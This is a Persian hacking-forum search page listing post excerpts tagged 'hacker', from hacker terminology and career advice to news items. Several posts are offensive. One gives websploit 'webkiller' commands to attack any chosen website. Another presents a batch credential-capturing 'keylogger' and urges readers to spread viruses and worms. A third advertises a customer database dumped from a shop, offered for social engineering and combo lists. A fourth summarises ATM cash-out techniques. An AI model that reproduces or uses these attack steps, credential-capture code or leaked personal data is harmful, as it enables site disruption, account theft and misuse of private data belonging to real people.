رفتن به مطلب



iran rules jazbe modir
ADS mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'هکر'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


انجمن آموزش امنیت و راه های مقابله با نفوذ

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
  • بخش ویژه (مخصوص اعضای ویژه)
  • پروژه های تیم
  • مسابقات
  • عمومی
  • بحث آزاد علمی
  • بخش دریافت
  • آرشیو

جستجو در ...

جستجو به صورت ...


تاریخ ایجاد

  • شروع

    پایان


آخرین به روز رسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


درباره من


جنسیت


محل سکونت

18 نتیجه پیدا شد

  1. Doctor Robot

    Hacking اصطلاحات هک

    هکر کیست؟ هک به روشی هوشمندانه برای حل مشکلی ویژه گفته می‌شود، و هکر به کسی گفته می‌شود که از این روش‌های هوشمندانه استفاده می‌کند. ولی متاسفانه امروزه هکر به معنای شخصی است که به منظور اخاذی و یا خرابکاری در سیستم‌ها و سایت‌ها شروع به خراب کاری می‌کند. البته برخی هکرها را به چند دسته تقسیم کرده اند: هکر کلاه سفید: به هکری گفته می‌شود که به منظور پیدا کردن مشکلات موجود در سرورها و نرم افزارها به آن‌ها نفوذ می‌کند و پس از گزارش مشکل به مسیولین در رفع عیب آن عیب سهیم است. هکرهای کلاه سفید برخی اوقات در مسابقاتی شرکت می‌کنند که شرکت‌های امنیتی برگذار می‌کنند. مثلا شرکت گوگل و تلگرام برای گزارش باگ به کاربران هدایای نقدی می‌دهند. هکرهای کلاه سفید می‌توانند از این طریق جوایز ده‌ها هزار دلاری و یا حتی چند صد دلاری برنده شوند. برخی مدیران سایت‌ها و سرور‌ها نیز به گروه‌های هک کلاه سفید مبالغی می‌دهند تا سعی کنند آن سیستم را هک کنند و عیب‌های موجود را گزارش دهند. هکر کلاه سیاه: به هکری گفته می‌شود که به منظور اخاذی و یا تخریب وارد سیستم‌ها و سایت‌ها می‌شوند. هکر‌های کلاه سیاه در همه جای دنیا تحت تعقیب هستند و اعمال آن ها خلاف قانون تلقی می‌شوند. هکر کلاه خاکستری: به هکری گفته می‌شود که گاهی اعمال هکر‌های کلاه سیاه و گاهی اعمال هکرهای کلاه سفید را انجام می‌دهد. هکر کلاه صورتی: به افراد آماتوری گفته می‌شود که برای ارضای حس کنکجاوی خود دست به اعمالی می‌زنند که یا سایت‌ها را تخریب کنند و یا به اطلاعاتی دست پیدا کنند که حق دسترسی به آن‌ها را ندارند.
  2. یکی از ابزارهای معروف هکینگ و اتکینگ بی شک ابزار websploit هست که با قابلیت های (wifijammer,wifi attacking, webkiller و ...) خلاصه ما در این اموزش از webkiller استفده میکنیم ابتدا ترمینال را باز کنید و با دستور زیر اقدام به نصب websploit بکنید : sudo apt-get install websploit با دستور بالا اقدام نصب این ابزار میشود بعد از نصب ابزار با دستور websploit ابزار را اجرا کنید و دستور زیر را بنویسید : use network/webkiller و بعد با دستور : set target target.com شما به جای target.com سایت مورد هدف را قرار بدید و بعد با دستور run اقدام به اجرای اتک کنید این به نظرم بسیاری از ابزار ها قدرت مند تر هست . با امید موفقیت امید وارم خوشتان امده باشد .
  3. پیوستنن تیم هکر های فلسطین به تیم امنیتی ما برای پیشرفت تیم امنیتی ما در راستای همکاری ???? ?????? ??? || Gaza Hacker Team قرار دادن پست های ما توی تیمشون Add news ADMIN PANEL Bypass Vulnerability - ???? ?????? ??? || Gaza Hacker Team
  4. تاپبک جامع اموزش های که یه هکر برای هکر واقعی بشه باید یاد بگیره قوانین اسپم ممنوع درصورت مشاهده بن اخلال در نظم انجمن بن سوال داشتید در بخش سوال جواب مطرخ شود با یه تشکر از استاید اموزش دهنده سپاس گذار باشید یا حق سوال تخصصی داشتید Inj3ctor@gmx.us Rednofozi@yahoo.com تاپیک به صورت فارسی و انگلیسی ارائه میشود
  5. مقدمه اغلب مردم فكر ميكنند كه هكرها، مهارت و دانش بالايي دارند كه ميتوانند سيستمهاي كامپيوتري را هك كنند و نقاط آسيبپذير را پيدا كنند. در حقيقت، يك هكر خوب، تنها بايد نحوه كار سيستم كامپيوتري را بداند و نيز بداند كه از چه ابزارهايي براي يافتن ضعفهاي امنيتي استفاده ميشود . اين فصل دنياي هكرهاي قانونمند را معرفي ميكند. هك قانونمند نوعي هك است كه با مجوز سازماني و براي افزايش امنيت انجام ميگيرد
  6. در این آموزش قصد داریم به این سوال جواب بدهیم که چگونه هکر شویم ؟ دنیای هک بسیار گسترده تر از امنیت است.برای اینکه شما هکر شوید ابتدا باید یک شناخت کامل از اون چیزی که می خواهید هک کنید داشته باشید، سپس به آن نفوذ کنید. اگر بخواهم این قضیه را با مثال به شما بگویم ، نزدیک ترین مثالی که می توانم بزنم و الان در ذهنم است این است که فرض کنید شما می خواهید یک دیوایس را بهبود بدهید و عملکرد آن را ارتقا بدهید. مسلما برای اینکار شما نیازدارید که ابتدا اون دیوایس را بصورت کامل بشناسید، نواقص آن را بشناسید و برطرف کنید سپس آن را بهبود دهید. منظور از مثال بالا این است که شما باید در مباجث کامپیوتری کاملا تسلط داشته باشید. چگونه هکر شویم ؟ اما برای اینکه به این سوال جواب بدهیم که چگونه هکر شویم ، من توصیه میکنم که ابتدا شما برای خود مشخص کنید که در چه زمینه ای از هک می خواهید فعالیت کنید. هک دسته های متفاوتی دارد : کلاینت هکینگ سرور هکینگ وب هکینگ اما اینا کاملا کلی هستند.اگر بخواهیم مسایل را باز کنیم با دسته های بسیار متفاوت تری روبرو می شویم به عنوان مثال هک و تست نفوذ بر روی شبکه هک و تست نفوذ بر روی وبسایت ها هک و تست نفوذ بر روی دیوایس های اندرویدی هک و تست نفوذ بر روی دیوایس های ویندوزی هک و تست نفوذ بر روی دیوایس های IOS و …. اموزش تصویری DNS Spoofing به کمک Settoolkit و ettercap حتی دسته های متنوع دیگری هم وجود دارد که آنها را هم بعضی ها جز هک می دانند.مانند کرک نرم افزار ها و دور زدن لایسنس نرم افزار ها که برای اینکار نیاز به دانش زبان سخت اسمبلی دارید. همانطور که مشاهده کردید هک دنیای بسیار گسترده ای دارد. یک نکته مهم: عملیات تست نفوذ و هک را می توان با کمک سیستم عامل های کالی لینوکس و ویندوز انجام داد چگونه هکر شویم اگر نظر من را می خواهید من به شما میگویم که شما برای اینکه یک هکر قدرتمند شوید باید به تمامی مباحث و استفاده از کالی لینوکس و ویندوز تسلط داشته باشید یا حداقل در چند مورد تسلط کامل و در چند مورد آشنایی داشته باشید تا در زمینه هک موفق باشید. چون اصلا جالب نیست که بگویید من هکر هستم اما فقط توانایی هک و تست نفوذ را بر روی شبکه آن هم تنها با سیستم عامل لینوکس داشته باشید. شما برای اینکه هکر قدرتمندی شوید حتما نیاز دارید برای تحلیل کد ها با زبان های برنامه نویسی آشنا باشید و چه بهتر اگر تلسط کامل بر روی یکی از زبان های برنامه نویسی داشته باشید.برای اینکه با زبان های برنامه نویسی مخصوص هک و امنیت آشنا شوید می توانید به آموزش زیر رجوع کنید بهترین زبان برنامه نویسی برای شروع هک و امنیت چیست ؟ اصول اولیه شبکه را بطور کامل مسلط باشید و چه بسا بهتر اگردوره های CCNA و CCNP را رفته باشید. همان طور که مشاهده کردید هکر نیازمند برخوداری از توانایی های متعددی است اسکنر جوملا با ابزار joomlavs هکرها افرادی قدرتمند و دارای دانشی بسیار بالا هستند چگونه هکر شویم اما افتخار این را دارم تا به کاربران گرامی اعلام کنم که شما تنها یک قدم تا هکر شدن فاصله دارید چون تیم امنیتی anonysecپس از ماه ها تلاش پکیج آموزش جامع کالی لینوکس به ربان شیرین پارسی را خدمت شما کاربران گرامی ارایه کرده است. در دوره پیش رو هدف ما هک – امنیت و تست نفوذ است و مباحث را از پایه تا پیشرفته دنبال میکنیم. در پکیج پیش رو ابعاد مختلفی از هک را مد نظر قرار داده ایم مانند: هک ، امنیت وتست نفوذ بر روی وبسایت هک ، امنیت وتست نفوذ بر روی سیستم عامل اندروید هک ، امنیت وتست نفوذ بر روی سیستم عامل ویندوز هک ، امنیت وتست نفوذ بر روی شبکه ها داخلی رمزنگاری و … و کلی مباحث دیگر که می تواند شما را برای ورود به دنیای هک و امنیت آماده کند و شما را تا سطح حرفه ای همراهی کنید. دوره جامع اموزش کالی لینوکس به زبان شیربن پارسی امیدوارم از مطلب چگونه هکر شویم لذت برده باشید پیروز و پایدار باشید
  7. Hackers High School 13 Complete Hacking E-books Hackers High School 13 Complete Hacking E-books
  8. قالب برای شرکت های تجاری و یا مغازه وغیره زبان : انگلیسی رمز : anonysec لینک : دانلود
  9. blackpetya

    Linux نصب whatsapp روی ubuntu

    یکی از برنامه های محبوب شبکه اجتماعی برنامهwhatsapp هست که در لینوکس هم قابل نصب هست برنامه whatsapp در لینوکس به اسم Whatsie میباشد برای نصب ان کافیست در ترمینال دستور زیر را بنویسید . sudo dpkg -i ~/Downloads/whatsie*.deb; sudo apt -f install بعد از نصب شدن میتوانید از داشبور unity اقدام به اجرای whatsapp کنید باید qr کد را با واتساپ گوشی خود اسکن کنید و استفاده کنید . امید وارم خوشتان امده باشد .
  10. با سلام با اموزش تبدیل عکس به نقاشی با فتوشاپ با شما هستیم :) امید وارم استفاده کنید لینک : دانلود رمز : anonysec
  11. دیتابیس از قبیل شماره تماس - نام کاربری - ادرس جمیل -ادرس خانه - نام شخص وغیره ... این دیتابیس امروز از یک سایت فروشگاهی دامپ شده است. با این اطلاعات میتونید انواع کار را انجام بدید از جمله مهندسی اجتماعی - هک - کرک - ساخت انواع پسلیست ها و کمبولیست ها - خرید فایل از سایت های خارجی زیاد کردن اعضا یک انجمن با فرستادن ایمیل و غیره... لینک دانلود امیدوارم خوشتان امده باشد :)
  12. خب باسلام و عرض ادب به کاربران گرامی anonysec قسمت دوم batch porgramming را میخواهم برای شما یاد دهم در این قسمت با متد ها set اشنا خواهید شد . خب الان توضیحاتی با رابطه متد set میخواهم بدهم , در زبان batch یکی از مهمترین عامل ها متد set است این متد برای دادن ویژگی یا داشتن کاربرد برنامه استفاده میشود مثلا به کد زیر توجه کنید . @echo off echo. cls echo ---------------------------------- echo - - echo - - echo - CREAT BY ANONYSEC - echo - - echo - - echo ---------------------------------- echo. set /p ANON=ENTER USER NAME : echo. set /p SEC-ENTER PASSWORD : echo %ANON% : %SEC% >> keyloger.txt color 2 pause > nul مثلا کد های بالا کد های یک کیلاگر هست مثل جلسه اول اول @echo off وارد کردیم شما در این قسمت کد های cls را دیده اید cls را اگر در cmd تایپ کنید clear history خواهد شد و از اول یک cmd پاک برای شما باز خواهد شد به این علت برای اینکه برانه اول باز شود cls را وارد میکنیم و در پایین از set /p استفاده کردیم ما برای تایین متغیر های نوع رشته ای متنی یا string اول باید set /p بنویسیم و یک اسمی به متغیر خود بگذاریم بعد جلوی اسم متغیر خود از کاربر اطلاعاتی را درخواست کنیم بعد از اینکه به سطر پایین رفتیم باز از set /p استفاده کرده ایم برای دریافت رمز عبور برای ذخیره کردن اطلاعات طرف باید از کد echo %anon% : %sec% >> key.txt را منویسیم تا اطلاعات کاربرا در فایل text ذخیره کند و دستور color که استفاده شده است دستور رنگ برنامه است برای دیدن رنگ های زیاد در cmd دستور color asss بزنید برای شما تمامی ترکیب ها غیر ترکیب هارا نمایش خواهد داد پس در این قسمت ما اد متد set استفاده کردیم تا از کاربر اطلاعاتی را بگیریم شما هم میتوانید با اموختن این زبان ویروس ویا کرم های خود را انتشار دهید تا قسمت بعدی خدا حافظ در قسمت بعدی با محیط if اشنا خواهید شد . تمامی حق کپی برداری بر anonysec است و هرگونه کپی رایت پیگرد قانونی دارد .
  13. ابتدا باید گوشیتون روت باشه دومم که باید برنامه Root browser را نصب کنید و اجرا کنید بعد به قسمت root رفته و فایل های خود را به قسمت data کپی و پیست کنید این روش کاملا تست شدست
  14. روش جدید هکرها برای پاروکردن پول‌های عابربانک =>> کسپرسکی انتی ویروس روسی سال گذشته اعلام کرد هکرهای عابربانک به 4 شیوه زیر تاکنون پول پارو کرده‌اند: 1=> قطع کردن عابربانک از شبکه و اتصال کامپیوتر خود و جا زدن آن به عنوان مرکز تبادل مالی و شبکه. 2=> کارمند داخلی بانک با استفاده از کلید(کد مخصوص) اجازه دسترسی به کابل شبکه را می‌دهد. هکر با یک کلید می‌تواند به چند دستگاه عابربانک در آنِ واحد وصل شده و به عنوان ادمین شبکه پول‌ها را خالی کند. 3=> قرار دادن دستگاه عابربانک در حالت تعمیر و دسترسی به جعبه سیاه برای تخلیه پول. 4=> یو اس بی آلوده به بدافزار و زدن آن به پورت دستگاه خودپرداز که از طریق یک فرد نفوذی در بانک انجام می‌شود.
  15. به نام خدا دوستان در این پست به معرفی بازی شبیه سازی هک شبکه Hacknet میپردازیم . یک بازی بسیار جذاب در سبک شبیه سازی می باشد که توسط کمپانی Team Fractal Alligator توسعه و توسط Surprise Attack انتشار پیدا کرده است. این بازی یک فضای مبتنی بر کدنویسی ترمینال داشته که فضای شبیه سازی هک های سیستمی و آنلاین را برای شما شبیه سازی کرده و به شما آموزش می دهد. شما باید حفره های امنیتی را به عمیق ترین حالات خود پیش ببرید تا شاید بتوانید مرگ یک هکر را فراتر از تصادفی که تلویزیون اعلام کرده است، اثبات کنید! Hacknet
  16. هکر ها می توانند مغز شما را هک کنند! محققان دانشگاه آلابامای بیرمنگام هشدار دادند هکرها قادرند با استفاده از امواج مغزی شما، رمز عبورهای حساس را به سرقت ببرند. مطالعات جدید نشان می­ دهد هِدست­ های نوار مغزی یا همان الکترودهایی که به کمک آن فعالیت مغز را به ثبت می­ رسانند، قابل هک­ شدن هستند. با بررسی امواج مغزی یک فرد در زمان وب گردی او، هکرها می ­توانند الگوهای عصبی فرد را شناسایی کرده و رمز عبور او را حدس بزنند. با اینکه هدست­ های نوار مغزی بیشتر در تحقیقات استفاده می­ شود، امروزه چند مدل از این هدست­ ها بصورت آزاد در بازار به فروش می ­رسند که اغلب کاربران بازی­ های رایانه ­ای را مورد هدف تبلیغات خود قرار داده است. نوار مغزی می­ تواند با استفاده از توان ذهنی یک فرد، اسباب­ بازی­ ها و بازی­ های رایانه ­ای را کنترل کند. مشاهده امواج مغزی افراد حین بازی­کردن چندان به کار هکرها نمی­ آید. اما اگر کاربران برای استراحت سری به اینترنت زده و مشغول گشت و گذار شوند چه؟ اگر وارد حساب کاربری خود در شبکه­ های مختلف بشوند چه؟ “نیتش ساکسنا” پروفسور رایانه و علوم اطلاعات در دانشگاه آلاباما، گفت: «ما بر این باوریم که این مسئله در آینده با تولید بیشتر و بیشتر دستگاه­ های بازی­ های کامپیوتری که دارای رابط مغزی-رایانه ­ای هستند به مشکلی جدی تبدیل خواهد شد. مسئله هک کردن می­ تواند با همین استراحت میان بازی­ کردن اتفاق بیافتد. بسیاری از مردم در زمان بازی­کردن با رایانه این هدست­ ها را بر روی سر خود دارند و ممکن است در مواقعی که رمز عبور خود را وارد می­ کنند نیز در حال استفاده از این هدست­ ها باشند.» ساکسنا و همکاران او آزمایشی برای اثبات این ایده و ریسک ­های پس از آن طراحی کردند. دانشمندان علم رایانه از شرکت­ کنندگان خواستند در حالی یک هدست بر روی سر خود دارند به صورت تصادفی رمزهای عبور مختلفی تایپ کنند. سپس با نرم­ افزار به بررسی موج­ های مغزی هر کدام از شرکت­ کنندگان پرداختند. ساکسنا در این باره می گوید که هکرها می­ توانند این روش را به این صورت به کار ببرند که از کاربران بخواهند با تایپ­ کردن اعداد خواسته شده، بازی متوقف­ شده را از سر بگیرند؛ تقریبا چیزی شبیه­ به سیستم CAPTCHA که در بعضی وبسایت­ ها برای شناسایی ربات­ ها استفاده می ­شود. تایپ­ کردن کاربران را به دفعات کافی با متون مختلف ثبت کنید؛ الگوریتم ­های رایانه ­ای می ­توانند ارتباط بین حروف و امواج مغزی را درک کرده و براساس فعالیت­ های مغزی یک کاربر، رمز عبور او را حدس بزند. نرم­ افزار ساخته شده به دست ساکسنا و همکاران او قادر به یادگیری الگوهای مناسب، پس از تایپ­ کردن ۲۰۰ کاراکتر توسط کاربران بود. دانشمندان مشغول در این زمینه اظهار داشتند: «الگوریتم مورد نظر می­ تواند احتمالات ممکن برای یک رمز عبور چهار رقمی را از ۱۰ هزار احتمال به ۲۰ احتمال و در رمزهای عبور ۶ رقمی، از ۵۰۰ هزار احتمال به ۵۰۰ احتمال برساند.» محققان اظهار داشتند که خطر امنیتی این هدست­ ها را می­توان با حذف نویزهای مبهم الکترونیکی و پنهان سازی امواج مغزی کاربران حین تایپ­ کردن رمز عبور برطرف نمود.
  17. P$YCH0S0C!@L

    دوره CCNA شرکت سیسکو (ویدیو)

    سلام دوستان عزیز این دوره سری آموزش های CCNA شرکت سیسکو (Cisco) رو قرار میدم ، این دوره مربوط به مفاهیم شبکه و یک پله بالاتر از network+ هست ، یجورایی میشه گفت کارشناس شبکه ! برای یاد گیری شبکه ، هکر حرفه ای شدن ، کار در شرکت های شبکه ، ISP ها ،و جاهای معتبر داشتن مدرک این دوره و یا گذروندن این دوره یکی از ضروریات هست! پس خیلی خیلی مهمه که این دوره رو یاد بگیرید! مخاطبان این دوره هم شامل طیف وسعی میشه ،از هکرها گرفته تا متخصصیش شبکه ،کسانی که فقط علاقه دارند ، کارمندان شرکت های شبکه و امنیت و..... پس شدیدا توصیه میکنم این دوره رو دنبال کنید! توضیحات تکمیلی : دوره CCNA دوره CCNA که اولین مدرک ارائه شده توسط شرکت سیسکو می باشد کوتاه شده عبارت Cisco Certified Network Associate است. دوره CCNA شامل اطلاعات پایه ای در مورد شبکه های WAN و LAN و نحوه نصب و راه اندازی تجهیزات سخت افزاری تحت شبکه از قبیل روتر و سوئیچ می باشد. افراد پس از گذراندن دوره CCNA با انواع اتصالات و کابل های شبکه جهت اتصال دستگاههای مختلف شبکه و نیز نصب و پیکر بندی و عیب یابی شبکه ها و تجهیزات شبکه از قبیل روتر و سوئیچ با اقیاس کوچک تا متوسط آشنا خواهند شد. در واقع مدرک CCNA تائید کننده مهارت و تخصص مقدماتی فرد در کار شبکه است.
  18. Ardit Ferizi یک شهروند کزوویی، در سن 20 سالگی به دلیل حمایت های مادی کشور های اسلامی چون عراق و شام، تشکیل یک سازمان تروریستی خارجی و دسترسی به اطلاعات محرمانه و ارائه ی آن به داعش دستگیر شد و به 20 سال زندان محکوم شد.این اطلاعات محرمانه شامل اسامی، ایمیل، پسورد، موقعیت مکانی و شماره ی تلفن 1351 نفر از افراد نظامی و کارکنان دولتی بود. Harold T.Martin Harold Thomas Martin پیمانکار سابق دولت، به سرقت50 ترابایت از اطلاعات آژانس امنیت ملی متهم شد و اطلاعات به سرقت رفته شامل، 500 میلیون صفحه از پرونده های محرمانه دولت در زمینه ی دفاع ملی بود. مارتین تصمیم گرفت این اطلاعات را به یک شرکت بفروشد ولی در نهایت در 5 اکتبر 2016 دستگیر شد و در حال حاضر به قید وثیقه، آزاد است تا پرونده ی او مورد بررسی قرار گیرد. Mike، کلاهبردار نیجریه مایک، کلاهبردار 40 ساله نیجریه ای معروف به شاهزاده ی کلاهبرداری در ایمیل است. او به افراد، پیشنهاد انتقال هزاران دلار با وعده ی جوایز وسوسه انگیز را داده بود. مایک، زیر مجموعه ای متشکل از 40 بیش از نفر در سراسر نیجریه، مالزی، آفریقای شمالی و دیگر قربانیان فریب خورده در سراسر جهان را در اختیار داشت. او همچنین در زمینه ی ارائه ی نرم افزارهای مخرب،کلاهبرداری های آنلاین و اتصال به حساب بانکی افراد در چین، اروپا و ایالات متحده فعالیت میکرد. به لطف یک عملیات مشترک بین اینترپل و EFCC نیجریه، مایک در سال 2016 در هارکوت(جنوب نیجریه)، به جرم هک، توطئه و بدست آوردن پول در این زمینه دستگیر شد. Paul Biteng, Juenel de Asis هکرهای فیلیپینی در تاریخ 27 مارس 2016 افرادی ناشناسی، وب سایت کمیسیون انتخابات فیلیپین را هک و مخدوش کردند. در طول این مدت، پرونده ی 55 میلیون رای دهنده به بیرون درز پیدا کرد. در 20 آوریل 2016، یک فرد 20 ساله، فارغ التحصیل رشته ی IT، به نام پل بیتنگ، توسط اداره ی ملی تحقیقات، شناسایی شد و به هک این سایت اعتراف کرد. او همچنین اعتراف کرد که علت هک، نشان دادن آسیب پذیری این وب سایت بود. علاوه بر این، در تاریخ 29 آوریل 2016، فرد 23 ساله ای، فارغ التحصیل علوم کامپیوتر، به دلیل دخالت در این هک دستگیر شد. در حال حاضر هر دو هکر، در انتظار حکم خود از طرف دادگاه هستند. هکر اینستاگرام اینستاگرام، اپلیکیشن موبایلی است که به کاربر اجازه ی به اشتراک گذاشتن عکس و ویدیو را میدهد. هک شبکه های اجتماعی چون اینستاگرام، فیس بوک، توییتر و غیره برای هکرها جذابیت زیادی دارد. دو هکر نوجوان که نامشان اعلام نشده است؛ با استفاده از مهندسی خاصی، شروع به فریب تعداد زیادی از کاربران آمریکایی کردند و حساب های کاربریشان را هک کردند. پلیس این مجرمان اینترنتی را که دو جوان 18 ساله بودند؛ در تاریخ 16 مارس 2016 در ایالات متحده دستگیر کرد.
×
×
  • جدید...